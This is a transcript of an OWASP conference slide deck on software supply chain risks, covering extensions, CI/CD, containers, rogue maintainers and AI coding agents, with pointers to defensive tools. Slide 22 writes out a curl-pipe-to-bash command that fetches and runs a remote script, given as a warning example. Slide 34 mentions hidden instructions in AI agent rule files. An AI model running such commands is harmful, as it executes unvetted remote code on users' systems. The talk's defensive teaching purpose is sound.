You secured your code dependencies, is that enough?

A presentation at Owasp London in June 2025 in London, UK by Anant Shrivastava

Slide 1

Slide 1

You secured your code dependencies, is that enough?

Anant Shrivastava

Slide 2

Slide 2

Anant Shrivastava

● Chief researcher @ Cyfinoid Research (Research Powered Trainings) ● 17+ yrs of corporate exposure ● Speaker / Trainer: BH/DC, c0c0n, nullcon, RootConf, RuxCon ● Project Lead: ○ Code Vigilant (Code Review Project) ○ Hacking Archives of India, ○ TamerPlatform (Android Security)

(@anantshri on social platforms) https://anantshri.info

Slide 3

Slide 3

Question : Have you heard about

SOFTWARE SUPPLY CHAIN SECURITY SBOM (SOFTWARE BILL OF MATERIAL) SOURCE COMPOSITION ANALYSIS TOOLS

Slide 4

Slide 4

Why?

Incidences • SolarWind • CodeCov • Colonial Pipeline

Resultant • EO by US President

Slide 5

Slide 5

Supply Chain issues are age old trust issues

Ken Thompson talk about Supply Chain security and inherent trust in 1983. During the lecture, Ken outlines a three-step process for altering a C compiler binary to implant a backdoor when compiling the “login” program, all without leaving any evidence in the source code. He got the idea from an older US MIL document published in 1974 titled “MULTICS SECURITY EVALUATION”

Ref

● https://users.ece.cmu.edu/~ganger/712.fall02/papers/p761-thompson.pdf ● https://research.swtch.com/nih ● https://seclab.cs.ucdavis.edu/projects/history/papers/karg74.pdf

Slide 6

Slide 6

…and it’s not going anywhere anytime soon…

In a report by European Union Agency for Cyber Security (ENISA), they state Supply Chain Compromise of Software Dependencies as one of the threats that gonna be at peak.

Ref https://www.enisa.europa.eu/p ublications/enisa-foresightcybersecurity-threats-for-2030

Slide 7

Slide 7

Effect across the globe in Govt Japan US EU India UK

https://ec.europa.eu/commission/presscorner/detail/en/ip_22_5374 https://www.japantimes.co.jp/news/2022/05/11/business/japan-passes-economic-security-bill-protect-sensitive-technology/ https://www.federalregister.gov/d/2021-10460/p-54 https://www.cert-in.org.in/PDF/SBOM_Guidelines.pdf

Slide 8

Slide 8

Why now?

• Software build automation == quicker release cycle • Automated release cycle == less wait for features • Faster feature release == less inclination to upgrade dependencies • Too much focus on OSS Codebase without helping the maintainers • Impossible segregation of features and bug fixes • Automated notification of vulnerability (hedonic hamster wheel)

Slide 9

Slide 9

Work done by Dependabot in last ~5 months

Start of Feb 2025 End of June 2025

2451693 issues closed 120751 new issues created

Slide 10

Slide 10

What is Software Bill of Material

Itemized list of all the ingredients in the software Ingredients ~ thirdparty components SBoM’s are mostly for one level depth only with other levels plugged in each other.

https://www.ntia.gov/report/2021/minimum-elements-software-bill-materials-sbom

Slide 11

Slide 11

SCA Source Composition Analysis Tools

Generate or Consume SBoM Identify Outdated Software Insecure Software EOL Product And more

Slide 12

Slide 12

Question : Raise your hands if

You have SCA tooling in your organization? You follow vulnerability management practices for source code components?

Slide 13

Slide 13

Let the fun begin © Cyfinoid Research 13

Slide 14

Slide 14

Software Supply Chains beyond Code chain

• We have focused too much on Software code itself • As consumers we are dealing with too many chain not in awareness • As a Company there are dependency chains far beyond code dependencies

Slide 15

Slide 15

What other chains?

Any Software or application which allows 3rd party to add or modify functionality

pluggable modules / plugins Extensions Theming customizations

Slide 16

Slide 16

A set of chain that existed 5 months back

A developer uses a Chrome extension to manipulate AI prompts, which are then fed into Visual Studio Code through a set of AI-driven code completion extensions. The resulting code is committed to GitHub, where a set of GitHub Actions automatically run analysis and tests. The code is then containerized into a Docker image, deployed on Kubernetes, running inside an EC2 instance, built from a specific AMI.

Slide 17

Slide 17

A Chain that exists now (besides previous)

A developer uses an autonomous AI agent to write code by providing them a one liner prompt and full access to the commandline. The resulting code is committed to GitHub, where a set of GitHub Actions automatically run analysis and tests. The code is then containerized into a Docker image, deployed on Kubernetes, running inside an EC2 instance, built from a specific AMI.

Slide 18

Slide 18

Simplified Supply Chain view

Slide 19

Slide 19

Why do they matter

PRODUCTION IS HARDENED, DEV NOT SO MUCH EASIER TO COMPROMISE LESS GUARDED PATHS SMALLER ORGS EASIER TO INFILTRATE / OCCUPY / ACQUIRE

Slide 20

Slide 20

Developer Machine : Why lucrative

Lots of credentials and access Developers require a bit of lax security to get job done Exceptions in network policy rules Mostly will have admin access Multiple powerful apps (IDE, debugger etc)

Slide 21

Slide 21

Show me data don’t just imagine

Slide 22

Slide 22

Case studies: WYS Is not WYG

Content delivered differently to curl and browser

Don’t curl | sh

https://jordaneldredge.com/blog/one-way-curl-pipe-shinstall-scripts-can-be-dangerous/

Don’t pipe to shell

https://www.seancassidy.me/dont-pipe-to-yourshell.html

curl https://anantshri.info/fun/legitimate.sh | bash

Slide 23

Slide 23

Chrome Browser

• By Google (claimed as fastest) • Installer runs without admin privilege (you can cancel admin prompts)

• https://arstechnica.com/security/2025/01/dozens-ofbackdoored-chrome-extensions-discovered-on-2-6-milliondevices/

Slide 24

Slide 24

What can a browser extension do

Slide 25

Slide 25

Cookie Monster

• https://gbhackers.com/malicious-editthiscookie-extension/

Slide 26

Slide 26

Visual Studio Code

• Too many examples to count • https://www.bleepingcomputer.com/news/security/maliciousvscode-extensions-with-millions-of-installs-discovered/

Slide 27

Slide 27

Visual Studio Marketplaces

• VS Code extensions marketplace is only usable by MS Products • https://open-vsx.org “Extensions for VS Code Compatible Editors” • Just over 8 million developers depend on Open VSX across dozens of VS Code based editors including Cursor, Windsurf, Google Cloud Shell Editor, and Gitlab Web IDE • Exploiting a CI issue a malicious actor could publish malicious updates to every extension on Open VSX

• Ref: https://blog.koi.security/marketplace-takeover-how-we-couldvetaken-over-every-developer-using-a-vscode-fork-f0f8cf104d44

Slide 28

Slide 28

Homebrew

• Google ads to bring traffic • Near replica of website • Serving install.sh with fake admin password prompt

https://x.com/ryanchenkie/status/1880730173634699393

Slide 29

Slide 29

Unexpected places for code execution

https://manpages.debian.org/bookworm/apt/sources.list.5.en.html https://www.golinuxhub.com/2018/05/how-to-execute-script-at-pre-post-preun-postun-spec-file-rpm/

Slide 30

Slide 30

Unexpected places or code execution

Git exploit when git clone —recursive-submodules

Slide 31

Slide 31

Notepad++

https://cybersecuritynews.com/hackers-hijacked-notepad-plugin/

Slide 32

Slide 32

Notepad ++ Impersonation

• https://notepad-plus-plus.org/news/help-to-take-down-parasite-site/

Slide 33

Slide 33

Cursor oh Cursor

Slide 34

Slide 34

Rulefiles

• Remember those CTF’s where flag was hidden in whitespaces • Just that but dangerous

https://www.pillar.security/blog/new-vulnerability-in-github-copilot-and-cursor-how-hackers-canweaponize-code-agents

Slide 35

Slide 35

C.I. / C.D. Systems

• Not just automation • Watch over the entire build or deployment practices • Essential Watchers in the current landscape

Slide 36

Slide 36

DEFENDING CI CD

https://media.defense.gov/2023/Jun/28/2003249466/-1/-1/0/CSI_DEFENDING_CI_CD_ENVIRONMENTS.PDF

Slide 37

Slide 37

Teamcity exploitation

https://www.darkreading.com/vulnerabilities-threats/global-teamcity-exploitation-opens-door-to-solarwinds-style-nightmare

Slide 38

Slide 38

Container Images

• Don’t install software • Download containers • Docker (ish) options needed

https://www.infosecurity-magazine.com/news/malicious-containers-found-docker/ https://blog.aquasec.com/supply-chain-threats-using-container-images

Slide 39

Slide 39

Dependency Caching Servers

https://socket.dev/blog/malicious-package-exploits-go-module-proxy-caching-for-persistence

Slide 40

Slide 40

Bait and Switch

Package created with a good intent but later abused

Wordpress free plugin purchased and backdoored • https://www.bleepingcomputer.com/news/security/backdoorfound-in-wordpress-plugin-with-more-than-300-000installations/

Slide 41

Slide 41

Rogue Maintainers

  • peacenotwar module sabotages npm developers in the node-ipc package to protest the invasion of Ukraine Overwrite all files with ❤ if origin is Russia or Belarus.
  • Malware Civil War - 25 malicious packages in npm, with some posing as “colors.js,” and even an instance of malware authors targeting each other through a package called “lemaaa” designed to manipulate Discord accounts.
  • Open source developer corrupts widely-used libraries, aQecting tons of projects - For packages color.js and faker.js, the maintainer pushed a corrupt update that triggers an infinite loop of weird characters.

Slide 42

Slide 42

So, what's the plan?

• A - Awareness: Identify and move unknown risks into known risks. • T - Trust But Verify: Every dependency, tool, and service should be validated. • O - Ongoing Monitoring: Continuous security checks to detect changes & anomalies. • M - Measure & Map: Build capabilities to answer real questions (e.g., how many machines have Chrome installed? How many plugins exist in GitHub workflows?).

Slide 43

Slide 43

Next Steps

No matter how hard I try I will not be able to cover the full breadth

Slide 44

Slide 44

Chrome Extension Auditing

https://www.extensionauditor.com/

Slide 45

Slide 45

End Point Visibility

https://www.osquery.io/

Ref: https://medium.com/quiq-blog/detecting-high-risk-chrome-extensions-with-osquerybca1a8856448

Slide 46

Slide 46

GitHub and Github Actions

Basic Common Sense ● Signed Commit ● Protected Branches ● Force reviews for pull request approval ● Force signed commits

Slide 47

Slide 47

GitHub and Github Actions

Tooling ● https://github.com/Legit-Labs/legitify ● https://best.openssf.org/SCM-BestPractices/ ● Implement allstar to enforce secure baselines in the organization. ● https://docs.zizmor.sh

Slide 48

Slide 48

Consumer : Vetting Process needed (Vet)

https://docs.safedep.io/

Slide 49

Slide 49

Consumer : Vetting Process Needed (Overlay)

Overlay is a browser extension that helps developers evaluate open source packages before picking them. It gathers data from various sources, such as Snyk Advisor, Debricked, Socket.dev, and Deps.dev, and displays them on the package pages of popular registries like npm, PyPI, and Go.

Install - https://github.com/osscar/overlay#installation

Ref - https://checkmarx.com/blog/software-supply-chain-security-leaders-collaborate-and-build-browser-extension-to-help-developers-choose-open-source/

Slide 50

Slide 50

Cloud Auditing

• ScoutSuite: https://github.com/nccgroup/ScoutSuite • Prowlet: https://github.com/prowler-cloud/prowler • Kube-hunter: https://github.com/aquasecurity/kube-hunter • Kube-bench: https://github.com/aquasecurity/kube-bench • KubiScan: https://github.com/cyberark/KubiScan • Kubeaudit: https://github.com/Shopify/kubeaudit • Trivy: https://github.com/aquasecurity/trivy • Cosign: Provenance : https://github.com/sigstore/cosign

Slide 51

Slide 51

Broad Visualization of Software Supply Chain

https://github.com/SecureStackCo/visualizing-software-supply-chain?tab=readme-ov-file

Slide 52

Slide 52

Supply-chain Levels for Software Artifacts

https://slsa.dev/

Slide 53

Slide 53

OWASP SCVS ~ SSDF

• https://scvs.owasp.org/ • https://csrc.nist.gov/Projects/ssdf

Slide 54

Slide 54

Open Software Supply Chain Attack Reference

https://pbom.dev/

Slide 55

Slide 55

Can of worms that I have not touched

SaaS

iOT

Slide 56

Slide 56

Thanks for listening & open to Questions?

@anantshri

anant @ cyfinoid.com